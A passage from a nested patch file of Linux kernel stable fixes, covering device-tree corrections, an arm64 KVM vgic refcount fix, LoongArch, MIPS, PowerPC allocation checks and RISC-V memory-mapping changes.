++		vreg_l18a_0p8: ldo18 {
++			regulator-min-microvolt = <880000>;
++			regulator-max-microvolt = <880000>;
++			regulator-initial-mode = <RPMH_REGULATOR_MODE_HPM>;
++		};
+ 	};
+ 
+ 	pm8150l-rpmh-regulators {
+@@ -439,13 +443,13 @@
+ &usb_1_qmpphy {
+ 	status = "okay";
+ 	vdda-phy-supply = <&vreg_l3c_1p2>;
+-	vdda-pll-supply = <&vdda_usb_ss_dp_core_1>;
++	vdda-pll-supply = <&vreg_l18a_0p8>;
+ };
+ 
+ &usb_2_qmpphy {
+ 	status = "okay";
+ 	vdda-phy-supply = <&vreg_l3c_1p2>;
+-	vdda-pll-supply = <&vdda_usb_ss_dp_core_1>;
++	vdda-pll-supply = <&vreg_l5a_0p875>;
+ };
+ 
+ &usb_1 {
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index c586378fc6bc7..c3c12b0cd4168 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -3940,7 +3940,7 @@
+ 			compatible = "qcom,apss-wdt-sm8150", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		timer@17c20000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index 4d9b30f0b2841..3d02adbc0b62f 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -4879,7 +4879,7 @@
+ 			compatible = "qcom,apss-wdt-sm8250", "qcom,kpss-wdt";
+ 			reg = <0 0x17c10000 0 0x1000>;
+ 			clocks = <&sleep_clk>;
+-			interrupts = <GIC_SPI 0 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <GIC_SPI 0 IRQ_TYPE_EDGE_RISING>;
+ 		};
+ 
+ 		timer@17c20000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index 793768a2c9e1e..888bf4cd73c31 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -903,9 +903,9 @@
+ 			};
+ 		};
+ 
+-		gpi_dma0: dma-controller@9800000 {
++		gpi_dma0: dma-controller@900000 {
+ 			compatible = "qcom,sm8350-gpi-dma", "qcom,sm6350-gpi-dma";
+-			reg = <0 0x09800000 0 0x60000>;
++			reg = <0 0x00900000 0 0x60000>;
+ 			interrupts = <GIC_SPI 244 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 245 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 246 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm64/boot/dts/renesas/r8a779g0-white-hawk-cpu.dtsi b/arch/arm64/boot/dts/renesas/r8a779g0-white-hawk-cpu.dtsi
+index 895f0bd9f7540..541b1e73b65e0 100644
+--- a/arch/arm64/boot/dts/renesas/r8a779g0-white-hawk-cpu.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a779g0-white-hawk-cpu.dtsi
+@@ -125,6 +125,9 @@
+ };
+ 
+ &hscif0 {
++	pinctrl-0 = <&hscif0_pins>;
++	pinctrl-names = "default";
++
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a-main.dtsi b/arch/arm64/boot/dts/ti/k3-am62a-main.dtsi
+index bc4b50bcd1773..9301ea3888021 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62a-main.dtsi
+@@ -245,7 +245,7 @@
+ 			     <193>, <194>, <195>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <87>;
++		ti,ngpio = <92>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 77 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 77 0>;
+@@ -263,7 +263,7 @@
+ 			     <183>, <184>, <185>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <88>;
++		ti,ngpio = <52>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 78 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 78 0>;
+diff --git a/arch/arm64/boot/dts/ti/k3-am65-main.dtsi b/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
+index ebb1c5ce7aece..83dd8993027ab 100644
+--- a/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
+@@ -856,7 +856,7 @@
+ 		assigned-clocks = <&k3_clks 67 2>;
+ 		assigned-clock-parents = <&k3_clks 67 5>;
+ 
+-		interrupts = <GIC_SPI 166 IRQ_TYPE_EDGE_RISING>;
++		interrupts = <GIC_SPI 166 IRQ_TYPE_LEVEL_HIGH>;
+ 
+ 		dma-coherent;
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-its.c b/arch/arm64/kvm/vgic/vgic-its.c
+index 00ad6587bee9a..3c344e4cd4cad 100644
+--- a/arch/arm64/kvm/vgic/vgic-its.c
++++ b/arch/arm64/kvm/vgic/vgic-its.c
+@@ -584,7 +584,11 @@ static struct vgic_irq *vgic_its_check_cache(struct kvm *kvm, phys_addr_t db,
+ 	unsigned long flags;
+ 
+ 	raw_spin_lock_irqsave(&dist->lpi_list_lock, flags);
++
+ 	irq = __vgic_its_check_cache(dist, db, devid, eventid);
++	if (irq)
++		vgic_get_irq_kref(irq);
++
+ 	raw_spin_unlock_irqrestore(&dist->lpi_list_lock, flags);
+ 
+ 	return irq;
+@@ -763,6 +767,7 @@ int vgic_its_inject_cached_translation(struct kvm *kvm, struct kvm_msi *msi)
+ 	raw_spin_lock_irqsave(&irq->irq_lock, flags);
+ 	irq->pending_latch = true;
+ 	vgic_queue_irq_unlock(kvm, irq, flags);
++	vgic_put_irq(kvm, irq);
+ 
+ 	return 0;
+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index 871a45d4fc84c..ae5a3a717655e 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -365,19 +365,26 @@ static int vgic_v3_uaccess_write_pending(struct kvm_vcpu *vcpu,
+ 		struct vgic_irq *irq = vgic_get_irq(vcpu->kvm, vcpu, intid + i);
+ 
+ 		raw_spin_lock_irqsave(&irq->irq_lock, flags);
+-		if (test_bit(i, &val)) {
+-			/*
+-			 * pending_latch is set irrespective of irq type
+-			 * (level or edge) to avoid dependency that VM should
+-			 * restore irq config before pending info.
+-			 */
+-			irq->pending_latch = true;
+-			vgic_queue_irq_unlock(vcpu->kvm, irq, flags);
+-		} else {
++
++		/*
++		 * pending_latch is set irrespective of irq type
++		 * (level or edge) to avoid dependency that VM should
++		 * restore irq config before pending info.
++		 */
++		irq->pending_latch = test_bit(i, &val);
++
++		if (irq->hw && vgic_irq_is_sgi(irq->intid)) {
++			irq_set_irqchip_state(irq->host_irq,
++					      IRQCHIP_STATE_PENDING,
++					      irq->pending_latch);
+ 			irq->pending_latch = false;
+-			raw_spin_unlock_irqrestore(&irq->irq_lock, flags);
+ 		}
+ 
++		if (irq->pending_latch)
++			vgic_queue_irq_unlock(vcpu->kvm, irq, flags);
++		else
++			raw_spin_unlock_irqrestore(&irq->irq_lock, flags);
++
+ 		vgic_put_irq(vcpu->kvm, irq);
+ 	}
+ 
+diff --git a/arch/csky/include/asm/jump_label.h b/arch/csky/include/asm/jump_label.h
+index d488ba6084bc6..98a3f4b168bd2 100644
+--- a/arch/csky/include/asm/jump_label.h
++++ b/arch/csky/include/asm/jump_label.h
+@@ -43,5 +43,10 @@ label:
+ 	return true;
+ }
+ 
++enum jump_label_type;
++void arch_jump_label_transform_static(struct jump_entry *entry,
++				      enum jump_label_type type);
++#define arch_jump_label_transform_static arch_jump_label_transform_static
++
+ #endif  /* __ASSEMBLY__ */
+ #endif	/* __ASM_CSKY_JUMP_LABEL_H */
+diff --git a/arch/loongarch/include/asm/elf.h b/arch/loongarch/include/asm/elf.h
+index 9b16a3b8e7060..f16bd42456e4c 100644
+--- a/arch/loongarch/include/asm/elf.h
++++ b/arch/loongarch/include/asm/elf.h
+@@ -241,8 +241,6 @@ void loongarch_dump_regs64(u64 *uregs, const struct pt_regs *regs);
+ do {									\
+ 	current->thread.vdso = &vdso_info;				\
+ 									\
+-	loongarch_set_personality_fcsr(state);				\
+-									\
+ 	if (personality(current->personality) != PER_LINUX)		\
+ 		set_personality(PER_LINUX);				\
+ } while (0)
+@@ -259,7 +257,6 @@ do {									\
+ 	clear_thread_flag(TIF_32BIT_ADDR);				\
+ 									\
+ 	current->thread.vdso = &vdso_info;				\
+-	loongarch_set_personality_fcsr(state);				\
+ 									\
+ 	p = personality(current->personality);				\
+ 	if (p != PER_LINUX32 && p != PER_LINUX)				\
+@@ -340,6 +337,4 @@ extern int arch_elf_pt_proc(void *ehdr, void *phdr, struct file *elf,
+ extern int arch_check_elf(void *ehdr, bool has_interpreter, void *interp_ehdr,
+ 			  struct arch_elf_state *state);
+ 
+-extern void loongarch_set_personality_fcsr(struct arch_elf_state *state);
+-
+ #endif /* _ASM_ELF_H */
+diff --git a/arch/loongarch/kernel/elf.c b/arch/loongarch/kernel/elf.c
+index 183e94fc9c69c..0fa81ced28dcd 100644
+--- a/arch/loongarch/kernel/elf.c
++++ b/arch/loongarch/kernel/elf.c
+@@ -23,8 +23,3 @@ int arch_check_elf(void *_ehdr, bool has_interpreter, void *_interp_ehdr,
+ {
+ 	return 0;
+ }
+-
+-void loongarch_set_personality_fcsr(struct arch_elf_state *state)
+-{
+-	current->thread.fpu.fcsr = boot_cpu_data.fpu_csr0;
+-}
+diff --git a/arch/loongarch/kernel/process.c b/arch/loongarch/kernel/process.c
+index 90a5de7463326..1259bc3129790 100644
+--- a/arch/loongarch/kernel/process.c
++++ b/arch/loongarch/kernel/process.c
+@@ -82,6 +82,7 @@ void start_thread(struct pt_regs *regs, unsigned long pc, unsigned long sp)
+ 	euen = regs->csr_euen & ~(CSR_EUEN_FPEN);
+ 	regs->csr_euen = euen;
+ 	lose_fpu(0);
++	current->thread.fpu.fcsr = boot_cpu_data.fpu_csr0;
+ 
+ 	clear_thread_flag(TIF_LSX_CTX_LIVE);
+ 	clear_thread_flag(TIF_LASX_CTX_LIVE);
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index 40ed49d9adff5..4e86441e63196 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -402,7 +402,6 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 	const u8 dst = regmap[insn->dst_reg];
+ 	const s16 off = insn->off;
+ 	const s32 imm = insn->imm;
+-	const u64 imm64 = (u64)(insn + 1)->imm << 32 | (u32)insn->imm;
+ 	const bool is32 = BPF_CLASS(insn->code) == BPF_ALU || BPF_CLASS(insn->code) == BPF_JMP32;
+ 
+ 	switch (code) {
+@@ -806,8 +805,12 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 
+ 	/* dst = imm64 */
+ 	case BPF_LD | BPF_IMM | BPF_DW:
++	{
++		const u64 imm64 = (u64)(insn + 1)->imm << 32 | (u32)insn->imm;
++
+ 		move_imm(ctx, dst, imm64, is32);
+ 		return 1;
++	}
+ 
+ 	/* dst = *(size *)(src + off) */
+ 	case BPF_LDX | BPF_MEM | BPF_B:
+diff --git a/arch/mips/alchemy/devboards/db1200.c b/arch/mips/alchemy/devboards/db1200.c
+index f521874ebb07b..67f067706af27 100644
+--- a/arch/mips/alchemy/devboards/db1200.c
++++ b/arch/mips/alchemy/devboards/db1200.c
+@@ -847,7 +847,7 @@ int __init db1200_dev_setup(void)
+ 	i2c_register_board_info(0, db1200_i2c_devs,
+ 				ARRAY_SIZE(db1200_i2c_devs));
+ 	spi_register_board_info(db1200_spi_devs,
+-				ARRAY_SIZE(db1200_i2c_devs));
++				ARRAY_SIZE(db1200_spi_devs));
+ 
+ 	/* SWITCHES:	S6.8 I2C/SPI selector  (OFF=I2C	 ON=SPI)
+ 	 *		S6.7 AC97/I2S selector (OFF=AC97 ON=I2S)
+diff --git a/arch/mips/alchemy/devboards/db1550.c b/arch/mips/alchemy/devboards/db1550.c
+index fd91d9c9a2525..6c6837181f555 100644
+--- a/arch/mips/alchemy/devboards/db1550.c
++++ b/arch/mips/alchemy/devboards/db1550.c
+@@ -589,7 +589,7 @@ int __init db1550_dev_setup(void)
+ 	i2c_register_board_info(0, db1550_i2c_devs,
+ 				ARRAY_SIZE(db1550_i2c_devs));
+ 	spi_register_board_info(db1550_spi_devs,
+-				ARRAY_SIZE(db1550_i2c_devs));
++				ARRAY_SIZE(db1550_spi_devs));
+ 
+ 	c = clk_get(NULL, "psc0_intclk");
+ 	if (!IS_ERR(c)) {
+diff --git a/arch/mips/include/asm/dmi.h b/arch/mips/include/asm/dmi.h
+index 27415a288adf5..dc397f630c660 100644
+--- a/arch/mips/include/asm/dmi.h
++++ b/arch/mips/include/asm/dmi.h
+@@ -5,7 +5,7 @@
+ #include <linux/io.h>
+ #include <linux/memblock.h>
+ 
+-#define dmi_early_remap(x, l)		ioremap_cache(x, l)
++#define dmi_early_remap(x, l)		ioremap(x, l)
+ #define dmi_early_unmap(x, l)		iounmap(x)
+ #define dmi_remap(x, l)			ioremap_cache(x, l)
+ #define dmi_unmap(x)			iounmap(x)
+diff --git a/arch/mips/kernel/setup.c b/arch/mips/kernel/setup.c
+index 7c540572f1f72..e46e7ec76b4f4 100644
+--- a/arch/mips/kernel/setup.c
++++ b/arch/mips/kernel/setup.c
+@@ -326,11 +326,11 @@ static void __init bootmem_init(void)
+ 		panic("Incorrect memory mapping !!!");
+ 
+ 	if (max_pfn > PFN_DOWN(HIGHMEM_START)) {
++		max_low_pfn = PFN_DOWN(HIGHMEM_START);
+ #ifdef CONFIG_HIGHMEM
+-		highstart_pfn = PFN_DOWN(HIGHMEM_START);
++		highstart_pfn = max_low_pfn;
+ 		highend_pfn = max_pfn;
+ #else
+-		max_low_pfn = PFN_DOWN(HIGHMEM_START);
+ 		max_pfn = max_low_pfn;
+ #endif
+ 	}
+diff --git a/arch/mips/kernel/smp.c b/arch/mips/kernel/smp.c
+index 1d93b85271ba8..002c91fcb842e 100644
+--- a/arch/mips/kernel/smp.c
++++ b/arch/mips/kernel/smp.c
+@@ -333,10 +333,11 @@ early_initcall(mips_smp_ipi_init);
+  */
+ asmlinkage void start_secondary(void)
+ {
+-	unsigned int cpu;
++	unsigned int cpu = raw_smp_processor_id();
+ 
+ 	cpu_probe();
+ 	per_cpu_trap_init(false);
++	rcu_cpu_starting(cpu);
+ 	mips_clockevent_init();
+ 	mp_ops->init_secondary();
+ 	cpu_report();
+@@ -348,7 +349,6 @@ asmlinkage void start_secondary(void)
+ 	 */
+ 
+ 	calibrate_delay();
+-	cpu = smp_processor_id();
+ 	cpu_data[cpu].udelay_val = loops_per_jiffy;
+ 
+ 	set_cpu_sibling_map(cpu);
+diff --git a/arch/powerpc/Kconfig b/arch/powerpc/Kconfig
+index 6050e6e10d321..2c94f9cf1ce00 100644
+--- a/arch/powerpc/Kconfig
++++ b/arch/powerpc/Kconfig
+@@ -806,6 +806,7 @@ config THREAD_SHIFT
+ 	int "Thread shift" if EXPERT
+ 	range 13 15
+ 	default "15" if PPC_256K_PAGES
++	default "15" if PPC_PSERIES || PPC_POWERNV
+ 	default "14" if PPC64
+ 	default "13"
+ 	help
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index 054844153b1fd..487e4967b60d2 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -42,18 +42,13 @@ machine-$(CONFIG_PPC64) += 64
+ machine-$(CONFIG_CPU_LITTLE_ENDIAN) += le
+ UTS_MACHINE := $(subst $(space),,$(machine-y))
+ 
+-# XXX This needs to be before we override LD below
+-ifdef CONFIG_PPC32
+-KBUILD_LDFLAGS_MODULE += arch/powerpc/lib/crtsavres.o
+-else
+-ifeq ($(call ld-ifversion, -ge, 22500, y),y)
++ifeq ($(CONFIG_PPC64)$(CONFIG_LD_IS_BFD),yy)
+ # Have the linker provide sfpr if possible.
+ # There is a corresponding test in arch/powerpc/lib/Makefile
+ KBUILD_LDFLAGS_MODULE += --save-restore-funcs
+ else
+ KBUILD_LDFLAGS_MODULE += arch/powerpc/lib/crtsavres.o
+ endif
+-endif
+ 
+ ifdef CONFIG_CPU_LITTLE_ENDIAN
+ KBUILD_CFLAGS	+= -mlittle-endian
+@@ -391,17 +386,7 @@ endif
+ endif
+ 
+ PHONY += checkbin
+-# Check toolchain versions:
+-# - gcc-4.6 is the minimum kernel-wide version so nothing required.
+ checkbin:
+-	@if test "x${CONFIG_LD_IS_LLD}" != "xy" -a \
+-		"x$(call ld-ifversion, -le, 22400, y)" = "xy" ; then \
+-		echo -n '*** binutils 2.24 miscompiles weak symbols ' ; \
+-		echo 'in some circumstances.' ; \
+-		echo    '*** binutils 2.23 do not define the TOC symbol ' ; \
+-		echo -n '*** Please use a different binutils version.' ; \
+-		false ; \
+-	fi
+ 	@if test "x${CONFIG_FTRACE_MCOUNT_USE_RECORDMCOUNT}" = "xy" -a \
+ 		"x${CONFIG_LD_IS_BFD}" = "xy" -a \
+ 		"${CONFIG_LD_VERSION}" = "23700" ; then \
+diff --git a/arch/powerpc/lib/Makefile b/arch/powerpc/lib/Makefile
+index 8560c912186df..9b394bab17eba 100644
+--- a/arch/powerpc/lib/Makefile
++++ b/arch/powerpc/lib/Makefile
+@@ -42,8 +42,8 @@ obj-$(CONFIG_FUNCTION_ERROR_INJECTION)	+= error-inject.o
+ # 64-bit linker creates .sfpr on demand for final link (vmlinux),
+ # so it is only needed for modules, and only for older linkers which
+ # do not support --save-restore-funcs
+-ifeq ($(call ld-ifversion, -lt, 22500, y),y)
+-extra-$(CONFIG_PPC64)	+= crtsavres.o
++ifndef CONFIG_LD_IS_BFD
++always-$(CONFIG_PPC64)	+= crtsavres.o
+ endif
+ 
+ obj-$(CONFIG_PPC_BOOK3S_64) += copyuser_power7.o copypage_power7.o \
+diff --git a/arch/powerpc/perf/imc-pmu.c b/arch/powerpc/perf/imc-pmu.c
+index ada817c49b722..56d82f7f9734e 100644
+--- a/arch/powerpc/perf/imc-pmu.c
++++ b/arch/powerpc/perf/imc-pmu.c
+@@ -299,6 +299,8 @@ static int update_events_in_group(struct device_node *node, struct imc_pmu *pmu)
+ 	attr_group->attrs = attrs;
+ 	do {
+ 		ev_val_str = kasprintf(GFP_KERNEL, "event=0x%x", pmu->events[i].value);
++		if (!ev_val_str)
++			continue;
+ 		dev_str = device_str_attr_create(pmu->events[i].name, ev_val_str);
+ 		if (!dev_str)
+ 			continue;
+@@ -306,6 +308,8 @@ static int update_events_in_group(struct device_node *node, struct imc_pmu *pmu)
+ 		attrs[j++] = dev_str;
+ 		if (pmu->events[i].scale) {
+ 			ev_scale_str = kasprintf(GFP_KERNEL, "%s.scale", pmu->events[i].name);
++			if (!ev_scale_str)
++				continue;
+ 			dev_str = device_str_attr_create(ev_scale_str, pmu->events[i].scale);
+ 			if (!dev_str)
+ 				continue;
+@@ -315,6 +319,8 @@ static int update_events_in_group(struct device_node *node, struct imc_pmu *pmu)
+ 
+ 		if (pmu->events[i].unit) {
+ 			ev_unit_str = kasprintf(GFP_KERNEL, "%s.unit", pmu->events[i].name);
++			if (!ev_unit_str)
++				continue;
+ 			dev_str = device_str_attr_create(ev_unit_str, pmu->events[i].unit);
+ 			if (!dev_str)
+ 				continue;
+diff --git a/arch/powerpc/platforms/44x/Kconfig b/arch/powerpc/platforms/44x/Kconfig
+index 25b80cd558f8d..fc79f84669335 100644
+--- a/arch/powerpc/platforms/44x/Kconfig
++++ b/arch/powerpc/platforms/44x/Kconfig
+@@ -173,6 +173,7 @@ config ISS4xx
+ config CURRITUCK
+ 	bool "IBM Currituck (476fpe) Support"
+ 	depends on PPC_47x
++	select I2C
+ 	select SWIOTLB
+ 	select 476FPE
+ 	select FORCE_PCI
+diff --git a/arch/powerpc/platforms/powernv/opal-irqchip.c b/arch/powerpc/platforms/powernv/opal-irqchip.c
+index d55652b5f6fa4..391f505352007 100644
+--- a/arch/powerpc/platforms/powernv/opal-irqchip.c
++++ b/arch/powerpc/platforms/powernv/opal-irqchip.c
+@@ -275,6 +275,8 @@ int __init opal_event_init(void)
+ 		else
+ 			name = kasprintf(GFP_KERNEL, "opal");
+ 
++		if (!name)
++			continue;
+ 		/* Install interrupt handler */
+ 		rc = request_irq(r->start, opal_interrupt, r->flags & IRQD_TRIGGER_MASK,
+ 				 name, NULL);
+diff --git a/arch/powerpc/platforms/powernv/opal-powercap.c b/arch/powerpc/platforms/powernv/opal-powercap.c
+index 7bfe4cbeb35a9..ea917266aa172 100644
+--- a/arch/powerpc/platforms/powernv/opal-powercap.c
++++ b/arch/powerpc/platforms/powernv/opal-powercap.c
+@@ -196,6 +196,12 @@ void __init opal_powercap_init(void)
+ 
+ 		j = 0;
+ 		pcaps[i].pg.name = kasprintf(GFP_KERNEL, "%pOFn", node);
++		if (!pcaps[i].pg.name) {
++			kfree(pcaps[i].pattrs);
++			kfree(pcaps[i].pg.attrs);
++			goto out_pcaps_pattrs;
++		}
++
+ 		if (has_min) {
+ 			powercap_add_attr(min, "powercap-min",
+ 					  &pcaps[i].pattrs[j]);
+diff --git a/arch/powerpc/platforms/powernv/opal-xscom.c b/arch/powerpc/platforms/powernv/opal-xscom.c
+index 6b4eed2ef4fa9..f67235d1ba2c5 100644
+--- a/arch/powerpc/platforms/powernv/opal-xscom.c
++++ b/arch/powerpc/platforms/powernv/opal-xscom.c
+@@ -165,6 +165,11 @@ static int scom_debug_init_one(struct dentry *root, struct device_node *dn,
+ 	ent->chip = chip;
+ 	snprintf(ent->name, 16, "%08x", chip);
+ 	ent->path.data = (void *)kasprintf(GFP_KERNEL, "%pOF", dn);
++	if (!ent->path.data) {
++		kfree(ent);
++		return -ENOMEM;
++	}
++
+ 	ent->path.size = strlen((char *)ent->path.data);
+ 
+ 	dir = debugfs_create_dir(ent->name, root);
+diff --git a/arch/powerpc/platforms/pseries/hotplug-memory.c b/arch/powerpc/platforms/pseries/hotplug-memory.c
+index 2e3a317722a81..051a777ba1b27 100644
+--- a/arch/powerpc/platforms/pseries/hotplug-memory.c
++++ b/arch/powerpc/platforms/pseries/hotplug-memory.c
+@@ -500,14 +500,15 @@ static int dlpar_memory_remove_by_index(u32 drc_index)
+ 		}
+ 	}
+ 
+-	if (!lmb_found)
++	if (!lmb_found) {
++		pr_debug("Failed to look up LMB for drc index %x\n", drc_index);
+ 		rc = -EINVAL;
+-
+-	if (rc)
++	} else if (rc) {
+ 		pr_debug("Failed to hot-remove memory at %llx\n",
+ 			 lmb->base_addr);
+-	else
++	} else {
+ 		pr_debug("Memory at %llx was hot-removed\n", lmb->base_addr);
++	}
+ 
+ 	return rc;
+ }
+diff --git a/arch/riscv/include/asm/sections.h b/arch/riscv/include/asm/sections.h
+index 32336e8a17cb0..a393d5035c543 100644
+--- a/arch/riscv/include/asm/sections.h
++++ b/arch/riscv/include/asm/sections.h
+@@ -13,6 +13,7 @@ extern char _start_kernel[];
+ extern char __init_data_begin[], __init_data_end[];
+ extern char __init_text_begin[], __init_text_end[];
+ extern char __alt_start[], __alt_end[];
++extern char __exittext_begin[], __exittext_end[];
+ 
+ static inline bool is_va_kernel_text(uintptr_t va)
+ {
+diff --git a/arch/riscv/include/asm/xip_fixup.h b/arch/riscv/include/asm/xip_fixup.h
+index d4ffc3c37649f..b65bf6306f69c 100644
+--- a/arch/riscv/include/asm/xip_fixup.h
++++ b/arch/riscv/include/asm/xip_fixup.h
+@@ -13,7 +13,7 @@
+         add \reg, \reg, t0
+ .endm
+ .macro XIP_FIXUP_FLASH_OFFSET reg
+-	la t1, __data_loc
++	la t0, __data_loc
+ 	REG_L t1, _xip_phys_offset
+ 	sub \reg, \reg, t1
+ 	add \reg, \reg, t0
+diff --git a/arch/riscv/kernel/module.c b/arch/riscv/kernel/module.c
+index 91fe16bfaa07c..a331001e33e66 100644
+--- a/arch/riscv/kernel/module.c
++++ b/arch/riscv/kernel/module.c
+@@ -424,7 +424,8 @@ void *module_alloc(unsigned long size)
+ {
+ 	return __vmalloc_node_range(size, 1, MODULES_VADDR,
+ 				    MODULES_END, GFP_KERNEL,
+-				    PAGE_KERNEL, 0, NUMA_NO_NODE,
++				    PAGE_KERNEL, VM_FLUSH_RESET_PERMS,
++				    NUMA_NO_NODE,
+ 				    __builtin_return_address(0));
+ }
+ #endif
+diff --git a/arch/riscv/kernel/patch.c b/arch/riscv/kernel/patch.c
+index e099961453cca..160e5c1caa9c4 100644
+--- a/arch/riscv/kernel/patch.c
++++ b/arch/riscv/kernel/patch.c
+@@ -13,6 +13,7 @@
+ #include <asm/fixmap.h>
+ #include <asm/ftrace.h>
+ #include <asm/patch.h>
++#include <asm/sections.h>
+ 
+ struct patch_insn {
+ 	void *addr;
+@@ -23,6 +24,14 @@ struct patch_insn {
+ int riscv_patch_in_stop_machine = false;
+ 
+ #ifdef CONFIG_MMU
++
++static inline bool is_kernel_exittext(uintptr_t addr)
++{
++	return system_state < SYSTEM_RUNNING &&
++		addr >= (uintptr_t)__exittext_begin &&
++		addr < (uintptr_t)__exittext_end;
++}
++
+ /*
+  * The fix_to_virt(, idx) needs a const value (not a dynamic variable of
+  * reg-a0) or BUILD_BUG_ON failed with "idx >= __end_of_fixed_addresses".
+@@ -33,7 +42,7 @@ static __always_inline void *patch_map(void *addr, const unsigned int fixmap)
+ 	uintptr_t uintaddr = (uintptr_t) addr;
+ 	struct page *page;
+ 
+-	if (core_kernel_text(uintaddr))
++	if (core_kernel_text(uintaddr) || is_kernel_exittext(uintaddr))
+ 		page = phys_to_page(__pa_symbol(addr));
+ 	else if (IS_ENABLED(CONFIG_STRICT_MODULE_RWX))
+ 		page = vmalloc_to_page(addr);
+diff --git a/arch/riscv/kernel/vmlinux-xip.lds.S b/arch/riscv/kernel/vmlinux-xip.lds.S
+index 75e0fa8a700ae..24a2fdd3be6a0 100644
+--- a/arch/riscv/kernel/vmlinux-xip.lds.S
++++ b/arch/riscv/kernel/vmlinux-xip.lds.S
+@@ -29,10 +29,12 @@ SECTIONS
+ 	HEAD_TEXT_SECTION
+ 	INIT_TEXT_SECTION(PAGE_SIZE)
+ 	/* we have to discard exit text and such at runtime, not link time */
++	__exittext_begin = .;
+ 	.exit.text :
+ 	{
+ 		EXIT_TEXT
+ 	}
++	__exittext_end = .;
+ 
+ 	.text : {
+ 		_text = .;
+diff --git a/arch/riscv/kernel/vmlinux.lds.S b/arch/riscv/kernel/vmlinux.lds.S
+index 4e6c88aa4d870..d478e063b8785 100644
+--- a/arch/riscv/kernel/vmlinux.lds.S
++++ b/arch/riscv/kernel/vmlinux.lds.S
+@@ -72,10 +72,12 @@ SECTIONS
+ 		__soc_builtin_dtb_table_end = .;
+ 	}
+ 	/* we have to discard exit text and such at runtime, not link time */
++	__exittext_begin = .;
+ 	.exit.text :
+ 	{
+ 		EXIT_TEXT
+ 	}
++	__exittext_end = .;
+ 
+ 	__init_text_end = .;
+ 	. = ALIGN(SECTION_ALIGN);
+diff --git a/arch/riscv/mm/pageattr.c b/arch/riscv/mm/pageattr.c
+index ea3d61de065b3..9587e44874152 100644
+--- a/arch/riscv/mm/pageattr.c
++++ b/arch/riscv/mm/pageattr.c
+@@ -5,6 +5,7 @@
+ 
+ #include <linux/pagewalk.h>
+ #include <linux/pgtable.h>
++#include <linux/vmalloc.h>
+ #include <asm/tlbflush.h>
+ #include <asm/bitops.h>
+ #include <asm/set_memory.h>
+@@ -25,19 +26,6 @@ static unsigned long set_pageattr_masks(unsigned long val, struct mm_walk *walk)
+ 	return new_val;
+ }
+ 
+-static int pageattr_pgd_entry(pgd_t *pgd, unsigned long addr,
+-			      unsigned long next, struct mm_walk *walk)
+-{
+-	pgd_t val = READ_ONCE(*pgd);
+-
+-	if (pgd_leaf(val)) {
+-		val = __pgd(set_pageattr_masks(pgd_val(val), walk));
+-		set_pgd(pgd, val);
+-	}
+-
+-	return 0;
+-}
+-
+ static int pageattr_p4d_entry(p4d_t *p4d, unsigned long addr,
+ 			      unsigned long next, struct mm_walk *walk)
+ {
+@@ -96,7 +84,6 @@ static int pageattr_pte_hole(unsigned long addr, unsigned long next,
+ }
+ 
+ static const struct mm_walk_ops pageattr_ops = {
+-	.pgd_entry = pageattr_pgd_entry,
+ 	.p4d_entry = pageattr_p4d_entry,
+ 	.pud_entry = pageattr_pud_entry,
+ 	.pmd_entry = pageattr_pmd_entry,
+@@ -104,12 +91,181 @@ static const struct mm_walk_ops pageattr_ops = {
+ 	.pte_hole = pageattr_pte_hole,
+ };
+ 
++#ifdef CONFIG_64BIT
++static int __split_linear_mapping_pmd(pud_t *pudp,
++				      unsigned long vaddr, unsigned long end)
++{
++	pmd_t *pmdp;
++	unsigned long next;
++
++	pmdp = pmd_offset(pudp, vaddr);
++
